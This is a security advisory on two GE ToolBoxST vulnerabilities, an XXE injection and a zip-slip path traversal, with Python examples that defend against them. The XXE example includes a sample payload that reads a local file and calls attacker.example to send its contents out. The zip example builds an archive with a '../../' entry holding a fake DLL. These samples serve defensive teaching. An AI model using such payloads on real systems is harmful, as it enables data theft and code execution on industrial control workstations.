Rewterz Threat Advisory – CVE-2021-44477, CVE-2018-16202 – GE Gas Power ToolBoxST Vulnerabilities
January 26, 2022
Severity
High
Analysis Summary
CVE-2021-44477
GE Gas Power ToolBoxST version v04.07.05C is vulnerable to XML external entity (XXE) injection using the DTD parameter-entity technique. Because input passed to the XML parser is not sanitized when a project/template file is parsed, a crafted file can declare parameter entities that read arbitrary files on the affected node and send their contents to an attacker-controlled host in an out-of-band (OOB) request. The result is disclosure and retrieval of arbitrary data from the node that opens the file.
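The following is an added Python illustration, not code from GE, Rewterz or the CISA advisory, of both sides of the flaw above: a constructed project file carrying the DTD parameter-entity OOB payload, and a parser that aborts on the first DOCTYPE declaration so no entity can ever be resolved, which is the missing sanitization the description refers to. ToolBoxST is a .NET application; the equivalent guard there is `XmlReaderSettings` with `DtdProcessing = DtdProcessing.Prohibit` and `XmlResolver = null`. The element names, file path and attacker host in the sample are assumptions.

```python
import xml.parsers.expat

# Constructed sample of the DTD parameter-entity OOB technique (hypothetical
# element names, paths and host). The parameter entity %dtd; pulls an
# attacker-hosted DTD which, in a real attack, would define &send; as
# "http://attacker.example/?<contents of %file;>", exfiltrating the file
# the moment the parser resolves the entity.
OOB_XXE_PROJECT = """<?xml version="1.0"?>
<!DOCTYPE project [
  <!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
  <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">
  %dtd;
]>
<project name="Unit1"><setting>&send;</setting></project>
"""

# Constructed benign project file with the same shape and no DTD.
BENIGN_PROJECT = """<?xml version="1.0"?>
<project name="Unit1"><setting>value</setting></project>
"""


class DtdRejected(ValueError):
    """Raised when a project file carries a DOCTYPE or external entity."""


def parse_project_without_dtd(xml_text):
    """Parse a project/template file with expat, refusing any DTD.

    Returns the elements as a list of (name, attributes) in document order.
    The DOCTYPE handler fires before any entity is declared or resolved, so
    an OOB payload is rejected before it can reach the network or the disk.
    """
    elements = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DtdRejected(f"DOCTYPE {name!r} is not allowed in project files")

    def on_external_entity(context, base, system_id, public_id):
        # Defence in depth: even if a DTD were allowed, never fetch anything.
        raise DtdRejected(f"external entity {system_id!r} blocked")

    def on_start(name, attrs):
        elements.append((name, attrs))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.Parse(xml_text, True)
    return elements


def project_accepted(xml_text):
    """True if the file parses under the no-DTD policy, False if rejected."""
    try:
        parse_project_without_dtd(xml_text)
    except DtdRejected:
        return False
    return True


if __name__ == "__main__":
    print("benign:", project_accepted(BENIGN_PROJECT))
    print("xxe:", project_accepted(OOB_XXE_PROJECT))
```

Rejecting the DOCTYPE outright is the right policy for a format the application itself writes and reads: project and template files have no legitimate need for a DTD, and a blanket refusal cannot be bypassed by entity-encoding tricks the way a regex over the raw text can.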
CVE-2018-16202
ToolBoxST prior to version 7.8.0 uses a vulnerable version of the Ionic .NET Zip library that does not sanitize entry path names, so an archive entry can be extracted above its parent directory and all the way to the root of the drive (a "zip slip" path traversal). An attacker who has compromised an HMI, or who writes their own SDI client, can upload device.zip from a controller, patch it to contain a malicious file under a traversal path, and download it back to the controller. The next user who performs an upload receives the tampered device.zip and extracts it on their HMI, creating the potential for arbitrary file write, overwrite and code execution on that HMI.
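An added Python example, not ToolBoxST or Ionic/DotNetZip code, of the unchecked extraction the description refers to and the containment check that prevents it: a constructed device.zip with one legitimate entry and one `../../` entry is extracted one member at a time, and every resolved target path is required to stay under the destination directory. The entry names and contents are constructed samples; the destination directory is a temporary one.

```python
import io
import os
import tempfile
import zipfile

# Constructed sample archive contents (hypothetical names and bytes): one
# legitimate entry and one traversal entry of the kind a patched device.zip
# would carry. The "MZ" bytes only stand in for a PE file.
SAMPLE_ENTRIES = {
    "config/unit1.xml": b"<project name='Unit1'/>",
    "../../ToolboxST/evil.dll": b"MZ...",
}


def build_device_zip(entries):
    """Build an in-memory zip; writestr keeps '..' components as written."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def is_contained(dest_dir, member_name):
    """True only if member_name resolves to a path under dest_dir.

    realpath collapses '..' and symlinks; commonpath then proves the target
    is the root or a descendant of it. An absolute name or a drive letter
    replaces dest_dir in os.path.join, so it fails the same check.
    """
    root = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(root, member_name))
    return os.path.commonpath([root, target]) == root


def extract_with_check(zip_bytes, dest_dir):
    """Extract each member only after its path has been validated.

    Returns (written, rejected) lists of member names. Rejected members
    are skipped rather than aborting, so the result shows exactly which
    entries were malicious.
    """
    written, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not is_contained(dest_dir, info.filename):
                rejected.append(info.filename)
                continue
            target = os.path.join(os.path.realpath(dest_dir), info.filename)
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(info.filename)
    return written, rejected


def demo():
    """Run the checked extraction into a temp dir and report what happened."""
    zip_bytes = build_device_zip(SAMPLE_ENTRIES)
    with tempfile.TemporaryDirectory() as dest:
        written, rejected = extract_with_check(zip_bytes, dest)
        benign_present = os.path.isfile(os.path.join(dest, "config", "unit1.xml"))
        # The traversal target would have landed two levels above dest.
        escaped = os.path.isfile(os.path.join(dest, "..", "..", "ToolboxST", "evil.dll"))
    return {
        "written": written,
        "rejected": rejected,
        "benign_present": benign_present,
        "escaped": escaped,
    }


if __name__ == "__main__":
    print(demo())
```

Python's own `ZipFile.extractall` already strips `..` components and absolute prefixes, which is why the check is written by hand here: the point is the per-entry validation that the vulnerable Ionic version lacked, and the same shape (resolve, then prove containment, then write) is what a fixed .NET extraction loop must do with `Path.GetFullPath` before it writes any entry.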
Impact
- Data Exfiltration
- Code Execution
Affected Vendors
- GE
Affected Products
- ToolBoxST: all versions prior to 07.09.07C
Remediation
Upgrade ToolBoxST to version 07.09.07C or later, which addresses both issues. Refer to the CISA advisory for patch, upgrade and suggested workaround details, and treat project/template files and device.zip archives sourced from a controller or another HMI as untrusted input until the upgrade is in place.